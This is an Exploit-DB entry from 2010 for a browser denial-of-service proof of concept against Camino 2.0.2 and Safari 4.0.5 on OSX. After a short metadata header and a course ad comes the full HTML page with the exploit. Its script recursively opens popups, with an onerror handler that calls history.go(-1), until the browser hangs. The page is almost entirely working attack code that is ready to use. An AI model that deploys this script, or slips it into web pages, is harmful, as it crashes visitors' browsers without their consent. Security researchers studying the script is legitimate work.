Multiple Browsers - 'history.go()' Denial of Service

EDB-ID:

12508

CVE:



Author:

Dr_IDE

Type:

dos


Platform:

OSX

Date:

2010-05-04


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

<--
Camino 2.0.2 history.go() DoS
Found By:   Dr_IDE
Tested On:  Camino 2.0.2 on OSX 10.6.3
Notes:      Impact is reduced because user must either have popup blocker off, or accept popups.

Tested On:  Safari 4.0.5 on OSX 10.6.3
Notes:      Impact is reduced because user must either have popup blocker off, or accept popups.
-->

<html>
<title>Dr_IDE - Camino 2.0.2 & Safari 4.0.5 DoS PoC</title>
<script>
function test(){
window.onerror=new Function("history.go(-1)");
window.open('http://www.exploit-db.com');
test();
}

test();
</script>
</html>